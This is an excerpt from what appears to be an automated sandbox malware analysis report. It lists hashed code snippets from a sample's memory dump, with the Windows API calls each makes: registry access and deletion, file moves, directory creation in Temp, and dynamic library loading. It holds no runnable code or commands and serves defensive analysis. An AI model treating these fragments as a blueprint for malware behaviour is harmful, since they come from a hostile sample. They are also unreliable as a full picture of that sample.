                                                  • Opcode ID: f038386b1086bb30888fe0ccdba35b42973a9f6d5176726927d32f5153013f8e
                                                  • Instruction ID: f4960ab97bc4c8a2d82e21847187181e2840903b19b2aeb21d370a46e1c92408
                                                  • Opcode Fuzzy Hash: f038386b1086bb30888fe0ccdba35b42973a9f6d5176726927d32f5153013f8e
                                                  • Instruction Fuzzy Hash: 49E0863144471496C1346F7CAE49D853B285B4133A7204326F178F20F1C738A9574E9D
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 0040332E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
                                                  • Instruction ID: fc1c1b99c1c3d1c2481461a51282f6204a9bfe71311cf5a9819f6edaa66b9ece
                                                  • Opcode Fuzzy Hash: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
                                                  • Instruction Fuzzy Hash: C6319F70200219EFDB11CF55ED84A9E3FA8FB00355B20443AF905EA1D1D778DE51DBA9
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402553
                                                  • RegCloseKey.KERNELBASE(?,?,?,Forkynders\baskets\acylate,00000000,00000011,00000002), ref: 004025F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  • Opcode ID: 0f245c043c1ac6dd2eee62d287729c30ac42d50cb898836ac0950eb2d6fed6d9
                                                  • Instruction ID: f0d649c8be7bcd6d72a7f6236f3e083c4832147513a68f4e0a15fa01edc77ece
                                                  • Opcode Fuzzy Hash: 0f245c043c1ac6dd2eee62d287729c30ac42d50cb898836ac0950eb2d6fed6d9
                                                  • Instruction Fuzzy Hash: A4113A71A10209EBDF14DFA4DA589AEB774FF04354B20843BE806B62D0D7B88A45DB5E
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                                                  • Instruction ID: 2e9f13adc1e302feb6e44b0cfdad9a37d499f26753b45a494d358932ab564816
                                                  • Opcode Fuzzy Hash: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                                                  • Instruction Fuzzy Hash: 2501F431724220EBEB295B389D05B6A3698E710314F10857FF855F66F1E678CC029B6D
                                                  APIs
                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040244E
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  • Opcode ID: 6c4ac5f552494e277442b68f231966bc4883ed08a379c2a92b2b125d0484959a
                                                  • Instruction ID: 0eea939cfefa250e45086769c78755c0b3bfdf1c9c70056638625836d9ad0d91
                                                  • Opcode Fuzzy Hash: 6c4ac5f552494e277442b68f231966bc4883ed08a379c2a92b2b125d0484959a
                                                  • Instruction Fuzzy Hash: FFF06232A00120ABDB10AFA89A4DAAE73A5AF44314F12443FE651B71C1DAFC5D01563E
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 00405687
                                                    • Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
                                                  • CoUninitialize.COMBASE(00000404,00000000), ref: 004056D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: InitializeMessageSendUninitialize
                                                  • String ID:
                                                  • API String ID: 2896919175-0
                                                  • Opcode ID: f19b0f2b61e7f4c06593e02124d9898e7b6166ce1a012b3c4f9efcba27a6f207
                                                  • Instruction ID: 82e1c39a18d35503deea9f0fbed0a799e98f034f8ad8166c80355f15d1698ca4
                                                  • Opcode Fuzzy Hash: f19b0f2b61e7f4c06593e02124d9898e7b6166ce1a012b3c4f9efcba27a6f207
                                                  • Instruction Fuzzy Hash: 8BF02472600A00ABE3115750AC01B2377A4EB80300F94483BEE88B22F1C77648228B6E
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: acc70c6f29d20ec2e0522a8a59fc4d0c048a143266ea016b0e5a54e905789e50
                                                  • Instruction ID: 68d2f30391901d1d9ba62db1430854f87f0e26d751f15bb82e1089b222079e22
                                                  • Opcode Fuzzy Hash: acc70c6f29d20ec2e0522a8a59fc4d0c048a143266ea016b0e5a54e905789e50
                                                  • Instruction Fuzzy Hash: 2AE0BF76B20114ABCB14DFA8ED9086E77B5EB54310760487AE902B3290C675AC11CB78
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                                    • Part of subcall function 004068C1: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                                                    • Part of subcall function 004068C1: wsprintfW.USER32 ref: 00406913
                                                    • Part of subcall function 004068C1: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406927
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                                                  • Instruction ID: ca9fc7dfa89fe5ea16e4639455fc103decb8165a688e618dc96f0396de22bceb
                                                  • Opcode Fuzzy Hash: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                                                  • Instruction Fuzzy Hash: A5E0867390422057E61056705E4CC3773A8ABC4750306443EF556F2140DB38DC35977A
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,004030AB,00438800,80000000,00000003), ref: 00406036
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                  • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                  • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                  • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,00405C12,?,?,00000000,00405DE8,?,?,?,?), ref: 00406012
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406026
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                  • Instruction ID: 2aab62ad23f8cb6709c95f945eae6201b0fb2c2ffcd307ea01f0c72ec21377a4
                                                  • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                  • Instruction Fuzzy Hash: 9AD0C972504131ABC2502728EE0889ABF55EF682717014A35F9A5A22B0CB314C628A98
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,004035CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405AF6
                                                  • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405B04
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                  • Instruction ID: 7b2d9cd717f5aff8da3a1f7dd460dbe6a594badd890d3698b32dee5738bc8dc1
                                                  • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                  • Instruction Fuzzy Hash: 50C04C30204601AEDA509B30DF08B177AA4AF50741F1158396246E40A0DA78A455D92D
                                                  APIs
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: ca598f01870ae34eccd880849d71d37fbd47e21ac257f25a9de2b30882e69ac1
                                                  • Instruction ID: 7206a17c4d5fce065d1639f2aed3a35bc4cb39007168cc9cbc0cfc9d8a61edfe
                                                  • Opcode Fuzzy Hash: ca598f01870ae34eccd880849d71d37fbd47e21ac257f25a9de2b30882e69ac1
                                                  • Instruction Fuzzy Hash: F4F0543160411497CB10AFB68F0DD5F33649F52328F254A3FB421B21D1D6FD8942556F
                                                  APIs
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
